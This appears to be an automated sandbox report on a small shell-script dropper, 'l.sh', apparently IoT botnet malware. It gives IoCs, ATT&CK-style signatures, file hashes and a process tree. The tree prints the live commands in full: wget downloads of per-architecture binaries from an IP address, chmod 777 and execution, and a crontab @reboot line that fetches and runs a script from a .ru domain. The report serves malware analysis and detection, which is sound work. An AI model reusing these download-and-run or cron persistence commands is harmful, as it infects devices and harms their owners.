Analysis
-
max time kernel
98s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-01-2025 16:13
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
l.sh
-
Size
240B
-
MD5
e2102b077fa0da3be5a5b07b22a34d20
-
SHA1
629a840f9cbd82d8126f2e6b26f4668af8757f10
-
SHA256
6f6de7f166f98d6391f52362327abeae69469b3dd8e09db11c11615a2c5cb31f
-
SHA512
3db852f800118e0a6343e3d121db6eeb851ae72856ec4e7b07edb665e151811b2b6435706795370550cdeaf8b9816b64d42e6c317a1b6c781660905876873fdf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 755 chmod 771 chmod 774 sh 796 chmod 737 chmod 743 chmod 747 chmod 751 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/upnp 738 upnp /tmp/upnp 744 upnp /tmp/upnp 748 upnp /tmp/upnp 752 upnp /tmp/upnp 756 upnp /tmp/upnp 772 upnp /tmp/upnp 797 upnp /tmp/upnp 800 upnp -
Renames itself 1 IoCs
pid Process 772 upnp -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 194.36.144.87 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.TH7oh8 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd 772 upnp -
description ioc Process File opened for reading /proc/393/stat killall File opened for reading /proc/794/status upnp File opened for reading /proc/796/status upnp File opened for reading /proc/2/stat killall File opened for reading /proc/22/stat killall File opened for reading /proc/80/stat killall File opened for reading /proc/339/stat killall File opened for reading /proc/6/stat killall File opened for reading /proc/143/cmdline killall File opened for reading /proc/685/stat killall File opened for reading /proc/795/status upnp File opened for reading /proc/18/stat killall File opened for reading /proc/20/stat killall File opened for reading /proc/36/stat killall File opened for reading /proc/382/stat killall File opened for reading /proc/1/stat killall File opened for reading /proc/9/stat killall File opened for reading /proc/13/stat killall File opened for reading /proc/16/stat killall File opened for reading /proc/717/cmdline upnp File opened for reading /proc/785/status upnp File opened for reading /proc/787/status upnp File opened for reading /proc/76/stat killall File opened for reading /proc/114/stat killall File opened for reading /proc/790/status upnp File opened for reading /proc/791/status upnp File opened for reading /proc/7/stat killall File opened for reading /proc/15/stat killall File opened for reading /proc/17/stat killall File opened for reading /proc/19/stat killall File opened for reading /proc/792/cmdline upnp File opened for reading /proc/801/status upnp File opened for reading /proc/707/stat killall File opened for reading /proc/792/status upnp File opened for reading /proc/1/cmdline upnp File opened for reading /proc/10/stat killall File opened for reading /proc/332/stat killall File opened for reading /proc/337/stat killall File opened for reading /proc/484/stat killall File opened for reading /proc/805/status upnp File opened for reading /proc/71/stat killall File opened for reading /proc/105/stat killall File opened for reading /proc/334/stat killall File opened for reading /proc/705/stat killall File opened for reading /proc/115/stat killall File opened for reading /proc/143/stat killall File opened for reading /proc/331/stat killall File opened for reading /proc/786/status upnp File opened for reading /proc/4/stat killall File opened for reading /proc/8/stat killall File opened for reading /proc/73/stat killall File opened for reading /proc/82/stat killall File opened for reading /proc/793/status upnp File opened for reading /proc/797/status upnp File opened for reading /proc/800/status upnp File opened for reading /proc/783/status upnp File opened for reading /proc/784/status upnp File opened for reading /proc/12/stat killall File opened for reading /proc/70/stat killall File opened for reading /proc/77/stat killall File opened for reading /proc/240/stat killall File opened for reading /proc/706/stat killall File opened for reading /proc/mounts upnp File opened for reading /proc/799/status upnp -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 754 wget 756 upnp -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/upnp l.sh
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to tmp directory
PID:708 -
/usr/bin/killallkillall -9 dvrLocker2⤵
- Reads runtime system information
PID:710
-
-
/bin/rmrm -rf upnp2⤵PID:716
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm -O -2⤵PID:718
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/upnp./upnp tplink.arm2⤵
- Executes dropped EXE
PID:738
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm5 -O -2⤵PID:741
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/upnp./upnp tplink.arm52⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm6 -O -2⤵PID:746
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/upnp./upnp tplink.arm62⤵
- Executes dropped EXE
PID:748
-
-
/usr/bin/wgetwget http://103.188.82.218/t/arm7 -O -2⤵PID:750
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/upnp./upnp tplink.arm72⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mips -O -2⤵
- System Network Configuration Discovery
PID:754
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/upnp./upnp tplink.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:756
-
-
/usr/bin/wgetwget http://103.188.82.218/t/mpsl -O -2⤵PID:758
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/upnp./upnp tplink.mpsl2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:772 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:774 -
/usr/bin/crontabcrontab -l4⤵PID:778
-
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:777
-
-
-
-
/usr/bin/wgetwget http://103.188.82.218/t/ppc -O -2⤵PID:782
-
-
/bin/chmodchmod 777 upnp2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/upnp./upnp tplink.ppc2⤵
- Executes dropped EXE
PID:797
-
-
/tmp/upnp./upnp tplink.x862⤵
- Executes dropped EXE
PID:800
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
85KB
MD5d8b9115310ca0429f6ec2473696156a2
SHA15497d765ad0b6ad6ed2204338faecd9671f6a60c
SHA2567f089801a37f1d9a83a5103c8f9b1c6fc00f9ce699cb812cc23704aea8d46c8c
SHA512a3adc2f2a36bdf40bda9e592f03bf51c3a3e7954fbeb8e52d1517537c72efc7df2d22e8be0d1ac85b768aacb45bd77cabb0ced0885ac96c17252b8af63cdb664
-
Filesize
102KB
MD545c898246a8ffe0b7cc20fe25669da04
SHA15ae935186b80f6beb84926d57337d5c0b9e3e1fc
SHA2561b0846e58fbb6a0e72d25edb81ec94961c0c7048a4e6f26876660f5a26675c77
SHA512ca75fb8ae0aa7977132c2888ff226f712f4e66f542ab121bcffdc3b3a912b906870b55d6415dfc60c133574739a71c1e5177418dd275d208f43d6ffc09c14636
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
100KB
MD5de6ef4e554d7fc17efc20fabafe82de8
SHA1eca13ec698bed4ccde75e459d9267e68cbf874e9
SHA2569fe5e0525979f5bbff9354895b7299f0ee4a2bad41877636a71fcafaae283ec0
SHA5122e05e623b1ed416af7dfd115daef34ad5c1a4d334a267a84900998f2c58c577e0cca3b55c5f2acc7074b6f3f957a8999d70864875d5d0534d0c28f33c97f847e
-
Filesize
306B
MD5ab76ecd0592141fa4d0bd7a34f7094e8
SHA13cd9b3695d83ea3ea903c040f608d290b9c50f10
SHA2561ad242390303dd43ad29f01e7d656e022a131fbd49ffbd11e57dddaca6a00e9a
SHA512f4a3b3fb20813a26763f9513de1e92b0f7a3b4988d7bc97fadef5f73a1eaed03fc0808d07be13306776a5f845ea819f04188f78ef8292982b29ac4517aa20b0e